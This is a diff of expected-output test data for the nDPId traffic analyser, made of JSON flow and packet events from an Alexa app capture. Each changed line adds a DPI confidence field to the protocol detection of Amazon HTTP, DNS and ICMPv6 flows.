 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":1490976139667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976139667,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxh7572AMrTWW6AScSAgygAAAgQFtAQCCAps+nrkAPZ02gEDAwg="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":3,"flow_last_seen":1490976139669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976139669,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ooFAAEAGTc6sECrYNFQ\/OMsYAFAytNZbe+e9gYAQAVe\/XAAAAQEICgD2dN5s+nrk"}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139642,"flow_last_seen":1490976139669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976139669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71nqwmwmRlL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139642,"flow_last_seen":1490976139669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976139669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71nqwmwmRlL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxrjsd\/DnToeVaAScSDohQAAAgQFtAQCCAps+naYAPZ02wEDAwg="}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxtRO\/n\/M6S6+6AScSAtRgAAAgQFtAQCCAps+ncBAPZ02wEDAwg="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxlSuJ7038mtw6AScSDlMAAAAgQFtAQCCAps+nm5APZ02wEDAwg="}
@@ -731,44 +731,44 @@
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2288,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ziJAAEAGIi2sECrYNFQ\/OMsbAFAzpLr7UTv6AIAQAVfL2AAAAQEICgD2dN9s+ncB"}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02RpAAEAGFzWsECrYNFQ\/OMsZAFDfya3DUrie9YAQAVeDwwAAAQEICgD2dN9s+nm5"}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976139678,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c61AAEAGfKKsECrYNFQ\/OMscAFApFQd4fxQzdYAQAVcjzwAAAQEICgD2dN9s+nXP"}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2291,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/315y9IEXZSL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2292,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/5100jxqrQhL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61SZU-lPFNL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81Ni5COup-L._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2291,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/315y9IEXZSL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2292,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/5100jxqrQhL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61SZU-lPFNL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81Ni5COup-L._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2295,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1490976139711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976139711,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyx1XQZuRlNdGa6AScSCQFAAAAgQFtAQCCAps+n\/1APZ03AEDAwg="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2296,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":3,"flow_last_seen":1490976139713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976139713,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MrdAAEAGvZisECrYNFQ\/OMsdAFCU10ZrV0GbkoAQAVcupAAAAQEICgD2dONs+n\/1"}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976139714,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61Tfp7ZVcoL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
-00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976140230,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00616{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1490976140230,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00653{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976140230,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00653{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976140230,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976140230,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976140230,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976139714,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61Tfp7ZVcoL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+00633{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976140230,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1490976140230,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976140230,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00679{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976140230,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976140230,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976140230,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976142629,"flow_last_seen":1490976142629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976142629,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
